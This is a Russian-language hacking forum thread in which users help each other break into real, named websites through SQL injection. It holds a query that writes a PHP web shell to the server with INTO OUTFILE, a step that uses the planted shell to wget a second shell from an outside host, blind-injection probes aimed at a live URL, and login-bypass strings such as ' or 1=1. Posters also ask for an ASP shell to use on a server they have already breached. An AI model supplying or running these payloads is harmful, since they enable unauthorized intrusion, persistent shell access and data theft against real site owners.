всем ку) http://www.uralremstroy.ru/catalog.php?group_id=104 с простыми эксплуатациями sql inj знаком, но как тут вывести кол-во полей ни как не пойму или там вообще нельзя вывести? Заранее спасибо.
Добрый вечер. Пытаюсь научиться скуль-инжектингу. Много читал, раскрутил скулю, все идеально, file_priv Y. Могу прочитать etc/passwd через load_file(). Как теперь залить минишелл? Ведь нужно знать полный путь, чтоб выполнить например такой код: PHP: SELECT '<?php eval($_GET[e]);?>' into dumpfile '/var/lib/mysql/shell.php' from mysql.user;
select '<?php system($_GET['q'])?>' into outfile '/path_to_web/maybe_some_dir/shell.php'. Такого файла не должно существовать, должны быть права на запись в папку. После идёшь http://site.com/maybe_some_dir/shell.php?q=wget http://yoursite.com/shell.txt -O s.php -O s.php - переименование. Это если система линуховая и ты не можешь сделать так, чтобы .php не обрабатывался на твоём сайте. Можешь просто форму аплоада сделать со скриптом залива файла (шелла основного). upd. "e" - двойные кавычки, чот форум одинарные ставит. upd. если тебе надо узнать путь, то ищи(сканеры директорий и файлов в помощь) файл с phpinfo(), оч часто на сайтах лежат. Либо пробуй вызвать ошибку скрипта, и если включён их показ - увидишь путь.
Code: '<?php system($_GET['q'])?>' Ошибка же. Вот так правильно будет: Code: '<?php system($_GET["q"])?>' или вообще без кавычек '<?php system($_GET[q])?>'
А там есть вообще sql inj? http://wifi.hm-ugratel.ru/?m[admin]&id=123 http://wifi.hm-ugratel.ru/?m[admin]&id=abc http://wifi.hm-ugratel.ru/?m[admin]&id=123' http://wifi.hm-ugratel.ru/?m[admin]&id=abc' Разницу чувствуешь? я - нет. Если и есть, то жесть какая слепая.
Там 4-ветка, и только блинд http://www.uralremstroy.ru/catalog.php?group_id=14)+and+substring(version(),1,1)=4--+
при сканирование сайта Acunetix Web Vulnerability Scanner 7 есть опасная уезвимость <Limit GET> require valid-user </Limit> как я понял это уязвимость связана с http и https при постановки https в нужный запрос получаем сертификат безопасности как эту уязвимость реализовать?
Не получается раскрутить скуль, при авторизации: При запросе, т.е. логине , выскакивает ошибка: При asd' or 1=1-- Но при asd' or '1=1-- ошибка пропадает, и пишется только что не правильный пароль. Помогите с запросом, уже с or 1=1 как только мог извращался, не пускает
что-то типа этого, но так как там соль, то однозначно сказать нельзя, попробуй тем не менее: asd' union select 'pass', 'salt', 1, '1 логин указываешь asd пасс pass
Есть данные для подключения к MSSQL серверу и шелл на серваке, никак не могу подкконектиться к базе, через php не хочет, как я понял нужен asp шелл с поддержкой mssql. поделитесь ктонибудь?
1' or 1=1 # И MySQL отдаст всех юзеров, где соблюдается условие 1=1. А соблюдается оно везде. 1' OR 1=1 LIMIT 1 # Думаю так должно сработать.
сегодня нашел сайтик: в mysql.user два пользователя root с разными хэшами... как такое возможно? просто 2 пасса у рута?